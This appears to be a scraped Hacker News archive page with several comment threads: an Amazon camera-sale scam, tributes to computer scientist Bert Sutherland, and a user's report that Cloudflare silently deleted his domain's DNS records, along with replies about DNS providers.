I can't imagine buying or selling most high-value items on Amazon: the buying side has already been covered in various places (https://seliger.com/2017/01/09/tools-continued-careful-buy-a...). I've sold cameras and lenses on Craigslist, which can have its own challenges, but never one as expensive as an A7R IV.

koolba(628) 4 days ago [-]

At least on Craigslist you can restrict the sales to meatspace.

Asking to meet on the steps of a police station does a great job of filtering out scammers.

cortesoft(10000) 4 days ago [-]

I spend tens of thousands of dollars on Amazon every year, buying everything from electronics to groceries to paper towels, and have never had any issues that were not resolved to my satisfaction.

jfim(10000) 4 days ago [-]

Wouldn't that be a good small claims court case? There's good documentation that the item has been shipped, and the seller is out of both the money and the camera.

uniformlyrandom(4307) 3 days ago [-]

I think that would be a good FBI case. I am sure it is a minimum of 2 charges, probably more (conspiracy to commit fraud across state lines, wire fraud).

TomMckenny(10000) 4 days ago [-]

Thief's last name is just an initial.

I say 'thief' because that's how it looks to me. But how can I or Amazon be confident given the evidence I've only just read about?

What would help is posting up front a list of evidence that would convince Amazon in case of a dispute. If Amazon does not provide this then perhaps a third party could figure it out and post it.

ikeboy(447) 4 days ago [-]

Amazon may suspend your account for doing so. It happened in the case I linked at https://news.ycombinator.com/item?id=22388122

Wowfunhappy(4075) 4 days ago [-]

But when you use Amazon you agree to binding arbitration...

freepor(10000) 4 days ago [-]

Ultimately when you mail something there is no way to prove what you mailed. You can mail a brick and say it was a camera or you can mail a camera and the buyer can say it was a brick. There's an opportunity here for companies with big real estate footprints like UPS store or Office Depot to offer verified shipping and/or receiving, where you hand them the items and they pack them up and ship them with a certification of what's inside.

onemoresoop(2520) 4 days ago [-]

Good, but not scam-proof: there can be a brick in a camera case in a box while the verified shipping record says 'camera in a box'. I don't really mean a brick here; the item could be defective, a different model, or something else the verification process could miss.

zxcmx(10000) 4 days ago [-]

That would be great and raise the bar, but the same dispute issues would exist, just with authenticity of goods.

A scammy buyer would purchase, say, 32GB sticks of RAM and ship back 1GB sticks with the stickers swapped.

deadmetheny(3772) 4 days ago [-]

Sounds about right. Amazon's return policies have always heavily favored customers, even after creating the marketplace.

jacquesm(45) 4 days ago [-]

No, especially after creating the marketplace. Before that, Amazon would have had a much stronger incentive to treat the customers and themselves in a more balanced way.

akurilin(4317) 4 days ago [-]

Startup idea: create a high quality camera gear buying and selling experience for the web, with many protections and conveniences built in. Selling your gear on Craigslist and meeting with random strangers at McDonald's and Starbucks is pretty much the only real alternative right now and gets old pretty fast.

This was an issue for music gear too, but somehow reverb.com managed to address it and make it a pretty painless experience. Their customer service is excellent, and if one of the two parties are unsatisfied, they'll intervene and try to find a compromise. They send you boxes to ship your gear in, they set up shipping for you, they automatically track the shipment as it gets picked up etc. I've been hoping to find something similar for camera gear, but have had no luck so far.

The only downside is that the prosumer camera equipment world seems to be rapidly shrinking, so it might not be a great idea to step into this space right now. Whereas there doesn't seem to be a dearth of people buying guitars, drum kit pieces, and effects pedals.

y2bd(4314) 4 days ago [-]

Keh (https://www.keh.com/) is sort of like this, except that they function more like a second-hand shop--you sell them your gear, and they hold inventory that other people can buy, meaning you never actually interact with the eventual buyer. Because of this though, I imagine they take a larger cut than Reverb does (and certainly more than eBay).

As a buyer I've had zero problems with Keh the couple of times I've used them.

TravelTechGuy(4051) 4 days ago [-]

Sad story, though not uncommon. I've heard many eBay horror stories involving buyers' scams.

Frankly, selling anything on Amazon is crazy. But if you do have to, vet your buyer. Look at their previous purchases and feedback. Avoid the quick deal that will blow up in your face.

The bottom line is that eBay (and Amazon too) are more focused on the buyers. Buying on eBay is great, because you have 100% buyer protection. There's no seller protection at all.

I'd recommend sticking to either local selling apps (like Craigslist etc.) where you can verify the buyer (though stay safe and do it somewhere public), or online communities that manage access and feedback (there are several on Reddit and Facebook).

city41(3280) 4 days ago [-]

I was surprised the article mentioned eBay as a better alternative for a seller. It really isn't; eBay will side with the buyer pretty much every time.

freepor(10000) 4 days ago [-]

If reading this story makes your blood boil and you need some catharsis, there's a story online that I can't find right now about a guy who went to the address of the fraudster and beat him with a piece of rebar, giving him a permanent limp.

stordoff(10000) 4 days ago [-]

I'm not sure in what world fraud is equivalent to a permanent debilitating injury, but even if it was, that doesn't make it right.

And even if it did, how do you know it's the right person? There are 5 people in my house (and I regularly ship things to other addresses). Do you just pick one and hope for the best?

onemoresoop(2520) 4 days ago [-]

Maybe that was an innocent person. Scammers are known to use other people's addresses; they know when the person is not at home and when the package arrives, and just go loot it.

crmrc114(10000) 4 days ago [-]

Did you sell it as used? If you opened the package and touched the product it can no longer be sold as new. I have called out sellers on this crap before and gotten my money back. When I order new I expect a factory sealed box. (Also illegal in the US https://www.law.cornell.edu/cfr/text/16/20.1 )

So assuming you sold this as used, that sucks and I feel for you. However, if you're one of those scumbags who sells used things on Amazon as new, I have no sympathy and I would happily report you to get my money back. (I have encountered this maybe twice in all the electronics I buy on Amazon.)

If you want to sell used things you have opened, flag them as such on Amazon or go to Ebay. I buy from both places and will always take a deal on a cheaper gently used item if its disclosed up front.

Edit: For clarity, FTA > 'To this day, I have no idea what he claimed was "missing" from the package. I even included all the original plastic wrap!' He opened a factory box and unwrapped the product. How else would he photograph all the parts that came with the kit?

jacquesm(45) 4 days ago [-]

That could very well be, but then the 'buyer' should return the goods.

OrgNet(2457) 4 days ago [-]

> I sold a mint-in-box Sony a7R 4

Ensorceled(10000) 4 days ago [-]

When this happens, and you get your money back, do you keep the product?

tempestn(1530) 4 days ago [-]

Does Amazon not have a 'New, open box' option?





Historical Discussions: Bert Sutherland Has Died (February 19, 2020: 680 points)

(680) Bert Sutherland Has Died

680 points 6 days ago by dang in 195th position

en.wikipedia.org | Estimated reading time – 6 minutes | comments | anchor

American computer scientist

William Robert 'Bert' Sutherland (May 10, 1936 – February 18, 2020) was an American computer scientist who was the longtime manager of three prominent research laboratories, including Sun Microsystems Laboratories (1992–1998), the Systems Science Laboratory at Xerox PARC (1975–1981), and the Computer Science Division of Bolt, Beranek and Newman, Inc. which helped develop the ARPANET.

In these roles, Sutherland participated in the creation of the personal computer, the technology of advanced microprocessors, the Smalltalk programming language, the Java programming language and the Internet.

Unlike traditional corporate research managers, Sutherland added individuals from fields like psychology, cognitive science, and anthropology to enhance the work of his technology staff. He also directed his scientists to take their research, like the Xerox Alto 'personal' computer, outside of the laboratory to allow people to use it in a corporate setting and to observe their interaction with it.

In addition, Sutherland fostered a collaboration between the researchers at California Institute of Technology developing techniques of very large scale integrated circuits (VLSI) — his brother Ivan and Carver Mead — and Lynn Conway of his PARC staff. With PARC resources made available by Sutherland, Mead and Conway developed a textbook and university syllabus that helped expedite the development and distribution of a technology whose effect is now immeasurable.[1]

Sutherland said that a research lab is primarily a teaching institution, 'teaching whatever is new so that the new can become familiar, old, and used widely.'[2]

Sutherland was born in Hastings, Nebraska on May 10, 1936,[3] to a father from New Zealand; his mother was from Scotland. The family moved to Wilmette, Illinois, then Scarsdale, New York, for his father's career. Bert Sutherland graduated from Scarsdale High School, then received his bachelor's degree in electrical engineering from Rensselaer Polytechnic Institute (RPI), and his master's degree and Ph.D. from Massachusetts Institute of Technology (MIT); his thesis advisor was Claude Shannon. During his military service in the United States Navy, he was awarded the Legion of Merit as a Carrier ASW plane commander. He was the older brother of Ivan Sutherland.[4] Bert Sutherland died on February 18, 2020, aged 83.[5][6]

References[edit]

  1. ^ Hiltzik, Michael. '2 Brothers' High-Tech History in California.' Los Angeles Times, February 19, 2004.
  2. ^ Sutherland, William R. 'Bert', 10 Years of Impact: Technology, Products, and People: Foreword to 10th Anniversary Volume Archived March 15, 2004, at the Wayback Machine, Sun Microsystems, Inc.
  3. ^ Kalte, Pamela and Nemeh, Katherine, 'American Men & Women of Science: Q-S' Thomson/Gale, 2003
  4. ^ Sutherland, Bert (February 21, 2020) [Interview took place on May 25, 2017]. 'Oral History of Bert Sutherland' (Interview). Interviewed by David C. Brock and Bob Sproull. Computer History Museum, Mountain View, California: YouTube. Retrieved February 21, 2020.
  5. ^ Computer History Museum [@ComputerHistory] (2020-02-19). 'Today we salute Bert Sutherland, who passed away yesterday' (Tweet) – via Twitter.
  6. ^ '复制粘贴 UI 之父、Java 和互联网创建者相继离世' ['Father of the copy-and-paste UI, creators of Java and the internet pass away in succession'] (in Chinese). CNBeta.com. 21 February 2020. Retrieved 21 February 2020.



All Comments: [-] | anchor

rococode(3195) 6 days ago [-]

Here are some tweets about it:

https://twitter.com/search?q=Bert%20Sutherland&src=typed_que...

This one appears to be the first (18 hours ago):

https://twitter.com/harrymccracken/status/123000105692436070...

The Computer History Museum has since tweeted about it:

https://twitter.com/ComputerHistory/status/12302002771412500...

KerrickStaley(3898) 6 days ago [-]

Thanks! The Computer History Museum seems like a reliable source on this.

I've added their tweet as a citation on the Wikipedia page.

alankay(10000) 5 days ago [-]

I knew Bert for well over 50 years, and the first word that comes to mind to describe him is 'lovable', and the second is 'foundational'.

It is too early for those of us who loved him to recount 'Bert stories' and especially 'Bert and Ivan' stories, but Dan has provided the links to the YouTube video CHM tribute to the two brothers. Everyone should also read the Wikipedia article about Bert.

Bert's PhD thesis is most often characterized by its title 'Online Graphical Specification Of Procedures', but once you look at it you realize that he was one of the first (if not the first) inventor of 'dataflow' programs, and in fact this thesis was central to the many 'prior art' definitions to quash lawsuits about dataflow ideas.

Another dimension to Bert's scientific and engineering career that is not mentioned enough is that he was one of the earliest and main drivers of what is called CAD today (a rather small number of people in different places made this happen in the early 60s -- including Bert's brother Ivan -- and Bert focused some of the powerful human and computing resources of Lincoln Labs on this vital technology).

Bert's personality was sunny, friendly, and 'sweetly firm', to the point that many people clamored to have him as their manager (including only half-jokingly: Ivan). I was completely thrilled when Parc brought in Bert to run the Systems Science Lab in which my group, Lynn Conway's group, Bill English's group etc were all ensconced.

Bert, as with the other enlightened ARPA research managers, knew that 'the geese wanted to lay their golden eggs' and the manager's job was to support these efforts, not to try to tell the geese how to lay the special eggs. He was superb at this, and many critical inventions and systems happened because he was the nurturer.

I guess I should tell a 'Bert and Ivan' story. Their father was a civil engineer who brought not just blueprints home but gadgets and kits for the two brothers -- who were just two years apart in age -- to play with. Bert would recall that Ivan was so smart that he would just start putting the stuff together while Bert read the manual. At the 95% point Ivan would get stuck and Bert would know what to do next. The two brothers with very different personalities got along wonderfully well over their entire lives, and would occasionally do a company together.

A big deal when the kids were young was their mother driving them down from Scarsdale to Murray Hill to Bell Labs to meet Claude Shannon. Years later at MIT, Shannon wound up being a thesis supervisor of both of their PhDs done a few years apart.

I think most of us from 50+ years ago in the ARPA community just revered and were in awe of the research generations that came before us, especially the one right before us. It was tough to do computing back then, but they didn't let this bother them at all. They would program anything they wanted to have happen -- mostly in machine code -- and they would design and build any hardware they needed to run the programs they needed -- mostly with discrete components and relatively high voltages over sometimes acres of computer.

They showed us how to work and play and design and sculpt and the deep art that lies behind the components. We can never thank them enough, and can only 'pay forward' by helping those who come after us.

dylanrw(4291) 5 days ago [-]

This is very edifying. Thank you for sharing.

sprafa(4175) 5 days ago [-]

Claude Shannon teaching them makes them essentially computer science royalty.

agumonkey(877) 5 days ago [-]

Wow, I didn't know Ivan had a brother. Feels like a hidden jedi brother.

kashyapc(10000) 5 days ago [-]

'Unlike traditional corporate research managers, Sutherland added individuals from fields like psychology, cognitive science, and anthropology to enhance the work of his technology staff.'

/me wonders how many 'modern' managers approach their work with that kind of sensibility.

52-6F-62(3698) 5 days ago [-]

They do bring in people from various other disciplines, but most of the time you'll find those people in product management/ownership roles or as 'scrum leaders' or something, usually not using their accumulated knowledge for much beyond communicating clearly and navigating politics enough to hold a job.

We definitely don't see enough deference to those fields of expertise, I think.

craftyguy(3311) 6 days ago [-]

These 'XYZ has died' posts should really include a short description of who the person was in the title.

saagarjha(10000) 6 days ago [-]

They almost always link to a page that does this.

gjs278(10000) 5 days ago [-]

yep. but they won't. HN rules are for thee, not for me. they do titles like this all the time.

jacquesm(45) 5 days ago [-]

For a fairly large chunk of the HN crowd Newman, Sutherland, Sproull, Dijkstra, Knuth and Kay are household names.

The fact that computer science is one of the few domains where new entrants simply accept the status quo and do not spend a minute on understanding how we got here is a problem. For one, it creates a disconnect between the older (and often wiser) generation in the field and the newcomers. For another, that disconnect then results in endless re-invention of the same wheels, because by the time the new cadre has acquired the wisdom the cycle will repeat.

Try imagining a modern day genetics student who does not know who Crick & Watson are. That's your typical CS specialist.

dang(195) 6 days ago [-]

A 1966 demo of his pioneering Ph.D. work on interactive visual programming: https://www.youtube.com/watch?v=NLyIYmPfCps.

His Ph.D. dissertation is here: https://dspace.mit.edu/handle/1721.1/13474. It was some of the earliest work on dataflow and graphical programming. I know this because Alan Kay told me to read it, so I did. You should too.

Edit: Bert, of course, was Ivan Sutherland's (of Sketchpad) older brother. There's a delightful dialogue with the two of them from 2004: https://www.youtube.com/watch?v=sM1bNR4DmhU ('Mom Loved Him Best: Bert & Ivan Sutherland').

dekhn(10000) 6 days ago [-]

Love the PhD. 'Thesis advisor: Claude Shannon'.

For those that aren't familiar, the TX-2 is one of the systems that led to modern interactive computers. It was far more powerful than you would expect for a computer in 1958, the company DEC was basically founded on this computer's architecture, and remarkably advanced computer graphics and image perception work was being done (https://dspace.mit.edu/bitstream/handle/1721.1/11589/3395912...)

Lincoln Labs, where it was hosted, was a fertile area of research at a time when far more people were in favor of academic military research (MIT played a huge role in WWII).

I built a visual programming system for grid computing a while ago and it's interesting how often this paradigm keeps coming up in random places, like music making, blender effects pipelines, etc, etc. You'd think that researchers would design neural network architectures in visual programming space, not in a programming language.

lallysingh(4187) 6 days ago [-]

Isn't that his younger brother Ivan?

KerrickStaley(3898) 6 days ago [-]

EDIT: Citation has been found, see comments.

Just a note: the Wikipedia article currently doesn't cite any sources stating that he has died, and I wasn't able to find anything on the internet. So it's not totally clear at this moment that the title is true.

dang(195) 6 days ago [-]

I'm basing this on https://news.ycombinator.com/item?id=22363476 and the fact that the Wikipedia article has a precise date. I sure hope it isn't wrong; that would be awful. I also emailed Alan to ask if he had a minute to come and post about it, because moments like this are learning occasions for younger (and not so younger) community members who don't know the history.




(677) Cloudflare silently deleted my DNS records

677 points about 23 hours ago by iudqnolq in 3915th position

txti.es | Estimated reading time – 4 minutes | comments | anchor

Cloudflare silently deleted my DNS records

Yesterday I followed up with a potential client to ask them what they thought of the proposal I sent them the previous Thursday. I was shocked to learn that they thought they had emailed me the same day to accept.

I began debugging, and figured out there was an issue with my MX records. The problem: there weren't any. In fact, I had no DNS records at all. I logged in to Cloudflare and was told 'You currently don't have any websites' and prompted to add a site.

At this point I thought I had been hacked, so I went to the audit log. The only recent event:

Date: 2020-02-18T22:52:34-05:00
User IP Address: 127.0.0.1
Resource: Zone
Audit Record: {{redacted}}
Metadata: { 'Zone name': 'danielzfranklin.org' }

The 'user' IP address immediately stood out to me: 127.0.0.1. At this point I believed this was some sort of bug on Cloudflare's end, so I went to file a support ticket. Before I could file a ticket, Cloudflare required me to search their support base.

Cloudflare 'helpfully' pointed me to the relevant help center article: 'Why was my domain deleted from Cloudflare?' 1. From it, I learned that the official way Cloudflare communicates that they have deleted your domain is by placing an event in the audit log with an IP of 127.0.0.1.

If I intentionally set out to build a horrible user experience I'm unsure if I could top this. I naively expected that I would be notified by email before Cloudflare broke everything. In the absence of that, I would expect to see a notice when I logged in. In the absence of that, I would expect to see a field in the audit log mentioning in human language what happened. In the absence of that, if for some arcane reason Cloudflare is unable to change the format of their audit logs, I would at a minimum expect a message on the audit log page that explained what a deletion logged to 127.0.0.1 means. I registered for Cloudflare with a Gmail address specifically so that I could receive notifications from them if there were issues with my email setup.

Unfortunately, the help page their ticketing system pointed me to is completely unhelpful. For some reason I trusted Cloudflare with both my registration and DNS, and every debugging step mentions at the top that 'It is not necessary to check domain registration for domains utilizing a Cloudflare CNAME setup.' The help page provides no information on why a domain registered with Cloudflare would be deleted.

To add insult to injury I learn that when Cloudflare automatically detects an anomaly with your domain they permanently delete all DNS records. Mine won't be difficult to restore, but I'm not sure why this is necessary. Surely it would be possible for Cloudflare to mark a domain as disabled without irrevocably deleting it? Combined with the hacky audit log, I'm left with the opinion that for some reason Cloudflare decided to completely half-ass the part of their system that is responsible for deleting everything that matters to a user.

Because Cloudflare deleted my domain registration I can't change the status from clientTransferProhibited through their dashboard so I don't think I can even leave.

I spent some time thinking about if it was fair for me to post this on the same day as I filed a support ticket with Cloudflare. I ultimately decided to because their ticketing system recommended I post on their community forum instead or in addition to submitting a ticket. The page informed me that because I don't have a business account I would receive much faster support from the 'community'. However, I'm unable to log in to their community forum. When I click the login button I'm redirected to my dashboard, and when I then click Support on the dashboard I'm redirected back to the forum without being logged in. I suppose it's possibly an issue with Firefox blocking cookies (although I disabled tracking prevention) so it's possible this part is partly a problem on my end.

Does anyone know what might have caused Cloudflare to delete my domain? Any ideas for how I could transfer my domain away from Cloudflare sooner?

Daniel Franklin

Edit: I gave Cloudflare permission to publicly disclose details 2. iudqnolq is my HN username.





All Comments: [-] | anchor

paulfurley(3962) about 22 hours ago [-]

FWIW I recently evaluated a few DNS companies after Namecheap ballsed up our MX records in a similar way.

I actively looked for someone we could pay money to, so we are their customer (as opposed to being a free-tier user, who is effectively a cost).

The winner was DNSimple[1], who do exactly 1 thing, and they do it extremely well. And they are small enough to not take themselves too seriously[2], which I really appreciate.

Oh and their normal support channel is email, and everyone in the company takes a turn. I tested out their support before signing up and quickly heard back from a competent engineer, so they passed that test too.

[1] https://dnsimple.com [2] https://dnsimple.com/dnsound <— bonkers

znpy(1679) about 22 hours ago [-]

Have you considered Route53?

iudqnolq(3915) about 22 hours ago [-]

Thank you. Looks like I'll just have to pay more. Any recommendations for a registrar?

iruoy(10000) about 22 hours ago [-]

NS1 could be another one to look at. I have never used their services (directly), but I've noticed Netlify uses them for their DNS services.

SnowingXIV(4064) about 21 hours ago [-]

I did the same after getting tired of NC's DNS interface. I host a few client sites with Netlify[1] anyway, and moving over to their DNS (NS1) has been a breath of fresh air. It is free but they do have some paid options, and the UI is dead simple, which should be a requirement. I feel fairly confident I can rely on them to not muck up DNS records, as this is critical to mail systems, websites, etc.

Two years ago there was a moment where I was close to working for them too so I always try to use their products where I see fit. :)

[1] https://docs.netlify.com/domains-https/netlify-dns/

pmlnr(1470) about 22 hours ago [-]

DigitalOcean has a free DNS service with an API; it's good and reliable.

Running my own dns looks more and more reasonable though.

homero(4183) about 11 hours ago [-]

Last I checked, Rackspace has good free DNS.

therealmarv(3234) about 23 hours ago [-]

Also don't forget: Cloudflare breaks many second and third world countries' Internet with their DNS captchas because they think the good guys live only in first world countries (maybe look up the word discrimination in your dictionary cloudflare) and force them to install extensions like PrivacyPass because they think 'we are so big and know what is right for the world'.

input_sh(3695) about 23 hours ago [-]

That's CDN captcha, not DNS. If you use Cloudflare solely as a DNS provider, your users don't see the captcha. If you route your traffic through their servers, then they do.

potency(10000) about 22 hours ago [-]

Cloudflare lost my support when they started de-platforming people for holding opinions they didn't agree with. Censorship outside of strictly legal bounds should not be tolerated from a company as powerful as Cloudflare.

J5892(10000) about 22 hours ago [-]

What sites have they de-platformed outside of legal bounds?

RL_Quine(10000) about 22 hours ago [-]

Why do you think you have a right to host with them? You don't, you have a privilege that's extended by them. You're welcome to host your own thing somewhere else.

mavhc(4215) about 22 hours ago [-]

Is it censorship if they refuse their money for a service? Pretty sure that's just business. Are they stopping you having a website?

sjburt(10000) about 22 hours ago [-]

At least in some cases, those people were claiming that because they hadn't been removed, Cloudflare supported them. I don't see what other option Cloudflare had at that point.

Mojah(1114) about 21 hours ago [-]

Occasions are rare where I get to say 'hey, I built a thing that might help here!' - so forgive me as I take this opportunity with both hands.

Whether this was a bug or a rare protective mechanism, there will be times when your DNS provider makes a mistake and removes records. You mentioned in your post that your DNS isn't hard to reproduce, but how certain are you that _all_ records are restored? How long do you have to fight DNS issues before it's OK?

I built DNS Spy [1] for this exact occasion. It monitors your DNS for any changes made, keeps a version of all DNS records (current & former) and allows you to restore/download a BIND9 zone file for your zone. You can easily import this into any commercial DNS provider or in your own BIND9/PowerDNS setup.

I would love to hear feedback on how DNS Spy could be improved when DNS disasters like these occur!

[1] https://dnsspy.io/

ancarda(3516) about 7 hours ago [-]

Just signed up - it's pretty nice. Any plans to add SSHFP or other record types?

im3w1l(4304) about 19 hours ago [-]

The issue I see with this is that

1) You can't use it after the fact.

2) It's very specialized.

People are not going to set up dozens and dozens of services to monitor for really rare things. It should be part of a general-purpose monitoring suite.

archon810(1228) about 14 hours ago [-]

Just wanted to point out that the menu doesn't work properly on mobile in case you want to fix it.

https://imgur.com/a/TcibAKs

donmcronald(10000) about 17 hours ago [-]

How do you get all records for domains that don't allow zone transfers (most don't)? I've always thought it was impossible to get 100% accurate results with normal DNS queries (e.g. ANY).
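A minimal sketch of what that attempt looks like with dnspython (the domain is a placeholder, and most authoritative servers will refuse the transfer, which is exactly the limitation in question):

import dns.query
import dns.resolver
import dns.zone

# Find a nameserver for the zone, then attempt a full zone transfer (AXFR).
DOMAIN = 'example.com'
ns_name = dns.resolver.resolve(DOMAIN, 'NS')[0].to_text()
ns_ip = dns.resolver.resolve(ns_name, 'A')[0].to_text()
try:
    zone = dns.zone.from_xfr(dns.query.xfr(ns_ip, DOMAIN))
    for name, node in zone.nodes.items():
        print(name, node.to_text(name))
except Exception as exc:
    # Most servers restrict AXFR to their own secondaries.
    print('transfer refused or failed:', exc)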

bauerd(10000) about 17 hours ago [-]

>but how certain are you that _all_ records are restored?

A solution to this is to keep DNS under version control with e.g. Terraform, deployed by CI; master is then authoritative.
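A minimal sketch of that workflow without Terraform, assuming Cloudflare's v4 API; the zone ID, token, and records.json file are placeholders, and a real pipeline would also diff and prune stale records:

import json
import requests

ZONE_ID = 'your-zone-id'
API = f'https://api.cloudflare.com/client/v4/zones/{ZONE_ID}/dns_records'
HEADERS = {'Authorization': 'Bearer YOUR_API_TOKEN'}

# records.json is the version-controlled source of truth, e.g.
# [{'type': 'A', 'name': 'www', 'content': '203.0.113.7'}]
with open('records.json') as f:
    records = json.load(f)

for record in records:
    resp = requests.post(API, headers=HEADERS, json=record)
    resp.raise_for_status()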

homero(4183) about 11 hours ago [-]

Do you use the cloudflare api to get them all? Otherwise you'll miss some

hashhar(3977) about 20 hours ago [-]

Looks really useful and fulfills a very important purpose. What good are all your backups if you can't get your services back up due to missing DNS configuration?

collinmanderson(1506) about 15 hours ago [-]

Nice! A few years ago I whipped up something simple using dig, diff, cron and some bash scripts. It's handy to get alerted when something changes, and I've definitely caught a few unintentional changes.
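A minimal single-file sketch of that idea; the domain, record types and snapshot path are placeholders, and the alert is left as a print to swap for email or a webhook:

import pathlib
import subprocess

DOMAIN = 'example.com'
TYPES = ['A', 'AAAA', 'MX', 'NS', 'TXT']
SNAPSHOT = pathlib.Path('/var/lib/dns-watch/example.com.txt')

def current_records() -> str:
    # dig +short prints just the record values, one per line.
    lines = []
    for rtype in TYPES:
        out = subprocess.run(['dig', '+short', DOMAIN, rtype],
                             capture_output=True, text=True, check=True).stdout
        lines += sorted(f'{rtype} {line}' for line in out.splitlines() if line)
    return '\n'.join(lines) + '\n'

now = current_records()
if SNAPSHOT.exists() and SNAPSHOT.read_text() != now:
    print(f'DNS records for {DOMAIN} changed!')
SNAPSHOT.parent.mkdir(parents=True, exist_ok=True)
SNAPSHOT.write_text(now)

Run it from cron and you have roughly the same thing.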

iudqnolq(3915) about 20 hours ago [-]

(OP here). That looks really useful. If I were running a real service I would definitely look into it. Because this is just the personal website and email of a college student, I don't think I could justify the expense, when using something like Uptime Robot to monitor whether a single record points to a web server would probably give me close to the same reliability.

techslave(4158) about 1 hour ago [-]

DNS Spy costs money? wow the art of sysadmin really is dead. having this kind of tight control of DNS used to be a given.

jgrahamc(23) about 22 hours ago [-]

This is being looked into internally and I am involved. Likely won't post an update here as it pertains to a customer account (unless customer agrees).

BTW If you, dear reader, ever find yourself so frustrated with Cloudflare that you feel like your only recourse is a blog post... my email is [email protected] and I'm happy to hear from people.

p1necone(10000) about 20 hours ago [-]

The problem is that big companies don't care about giving quality support for their products, and for the most part they get away with it. From their perspective there's no problem to solve.

Your solution basically boils down to 'companies are failing to escalate support issues well, so they should escalate support issues well.'

martin1975(4268) about 21 hours ago [-]

You guys are the worst censors, even on your own blog. Any criticism of your CEO or of the way things have been done, completely out of integrity with your own past policies (such as cutting off providers because your CEO woke up self-righteous on the wrong foot that day), gets moderated away or never even admitted to the CF blog.

You've screwed up so many times, I am surprised more people aren't onto your tired antics by now. Thankfully, you cannot delete this post; perhaps many fanboys will downvote it, but at least I can tell you how I feel.

rswail(10000) about 11 hours ago [-]

Having the CTO offer up support in this way is heartening, especially because infrastructure suppliers are getting more and more centralized, which leads to possible single points of failure even within individual companies' distributed environments.

AndrewWarner(734) about 12 hours ago [-]

He gave me an incredibly detailed and fast response to an issue I was fact-checking.

paulddraper(4100) about 22 hours ago [-]

Please do update if possible.

It's likely a good lesson for all.

andrewstuart(999) about 21 hours ago [-]

I've put this idea forward a number of times here on HN in regards to other big tech companies.

Technology companies need an 'ombudsman' - a contact that customers can go to when the normal tech support processes have failed.

The Ombudsman must not be part of the technology company's ordinary support processes; it must be entirely separate, and have the highest-level authority to demand action within the company.

To avoid the Ombudsman being overused, you could give it a price of say $20, which is always refunded when the case is resolved.

HN constantly has front-page posts from people for whom big tech companies' support processes have failed, but who have simply no other recourse unless they have 'a friend in the business'.

It just doesn't work to have some random Cloudflare person offer their email address as some post disaster issue resolution process on social media. Formalise it with an official Ombudsman and maybe then companies like Cloudflare might avoid HN front page bad publicity.

I had an issue at 'one of the biggest tech companies' that went on for days and days in which tech support kept telling me I had set up something wrong, until eventually I emailed one of the top managers who I happen to 'know' at that company - it was fixed within hours. That 'contact a friend in the business who can actually get things done' is a necessary part of a large support organisation and it simply does not exist yet in any tech company that I know of.

rationalfaith(10000) about 22 hours ago [-]

You better add redundancies here on untracked transactions on your DNS record ledger.

iudqnolq(3915) about 22 hours ago [-]

OP here.

You can post updates with any relevant information. Probably goes without saying, but if the issue has to do with my billing or address please don't post specific details without asking me first.

I will link to this comment from TFA for verification. (Edit: added to the bottom. If you need more verification you have my email.)

Edit2: I see that the domain is back in my account and listed as 'Pending Nameserver Update'. I don't think that's because of something I did.

jiggawatts(10000) about 19 hours ago [-]

Please explain something to me.

For me and many of my customers, having your 'entire cloud deleted' is like... the #1 nightmare scenario.

So why does this capability/function even exist for active accounts at CloudFlare? It sounds like the OP fell victim to what is essentially a regular process.

Or to put it another way: No amount of explanation or assurance is ever going to make me feel comfortable with my doctor having a handgun as one of his medical instruments.

diegoperini(4218) about 20 hours ago [-]

First, you are awesome, really :)

Second, a bunch of honest questions:

Did you consult your supervisor (or anyone with authority) to be able to bypass the support process (if there is any) like this? If so, what was the response? If the response was negative, how did you convince people? After things resolve, can you kindly post how many spam or unrelated emails you receive, so that it will be an example to the industry?

I'd like to put my skepticism on hold and blindly believe that your post is a reflection of pure concern and not just a PR stunt for damage control.

rattray(4185) about 20 hours ago [-]

Context for the lazy, jgrahamc is the longtime CTO of Cloudflare.

ajonit(4231) about 18 hours ago [-]

Now that the OP has given the go-ahead to go public, we will eagerly await your update, jgc.

gist(2274) about 21 hours ago [-]

> BTW If you, dear reader, ever find yourself so frustrated with Cloudflare that you feel like your only recourse is a blog post... my email is [email protected] and I'm happy to hear from people.

I know that people will think it's great that you are doing this, and I also know that you think it's good (for you) to have a feel for the issues that frustrate everyday users. But I think it's not a great use of a company exec's time, and I am not even sure it's a good way to deploy resources at Cloudflare.

The reason is people will tend to (as a rule) do as little as they can themselves but then use as a hammer the court of public opinion to get something resolved.

You say 'ever find yourself so frustrated with Cloudflare', but you know that is different for different people. What will happen is that people will use you as a help desk, and then, after you don't help them as quickly as they think you should, they will follow up with a post, comment or story about how you did nothing.

Separately, if someone is posting publicly about an issue (as this person is) and you can verify that it's actually coming from the customer (I mean, who says it actually is?), I don't think you need them to say it's OK to resolve it online. In fact, to me it's the opposite: you take the time to reach out publicly, and you take what follows, good or bad, even calling the customer out (yes, you can do that, by the way) if you think they didn't put the appropriate effort into finding an answer.

johnklos(10000) about 23 hours ago [-]

Is it really all that surprising when a big company that claims to be good but hosts phishing content in the name of free speech does whatever they want, including breaking things and not explaining why?

I don't trust Cloudflare one bit, and I think everyone should question whether their attempt to re-centralize everything is beneficial to the planet.

There are two major problems here: one, the problem itself, the deletion of DNS records for apparently no good reason; and two, the bigger problem, that it's incredibly difficult to talk to a human about what happened, so there's no assurance it won't happen again.

If people want things to be reliable, we've got to stop using companies with which we cannot communicate.

djsumdog(840) about 23 hours ago [-]

Does OP have a free account with just DDoS protection? Does a paid account still have the notice to ask in the community forums first?

ocdtrekkie(2833) about 23 hours ago [-]

IMHO (and I know the parent post includes significant difficulties getting back out of Cloudflare), services like Cloudflare may be crucial to decentralization. I can't deal with something like my blog post being frontpaged on HN if my website is hosted in my house, unless I have a good CDN.

As a self-hosting enthusiast, something like Cloudflare is one of the best chances of having a plan that competes with 'just hosting it in the cloud'.

djsumdog(840) about 23 hours ago [-]

I really developed a strong dislike for Cloudflare after they banned certain customers for political reasons[1]. The CEO mentioned how maybe it wasn't the right thing to do... and then they did it again.

There aren't really any self-hosted solutions for DDoS protection like Cloudflare, since it requires things happening in the network layer. Implementing a solution would require access to monitor and reshape the local network, but I'm glad to see companies like Linode and DO offering DDoS protection packages.

I want to start running my own DNS-over-HTTPS server as well, so I can point Firefox DNS requests at a self-hosted solution and not at Google or Cloudflare. I really don't trust them and am having trouble understanding why so many other people do.

[1]: https://battlepenguin.com/politics/the-new-era-of-corporate-...
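A minimal sketch of smoke-testing such an endpoint with dnspython before pointing a browser at it; the URL is a placeholder for wherever the self-hosted resolver would live:

import dns.message
import dns.query  # pip install 'dnspython[doh]'

# Send an ordinary DNS query over HTTPS (RFC 8484) and print the answer.
q = dns.message.make_query('news.ycombinator.com', 'A')
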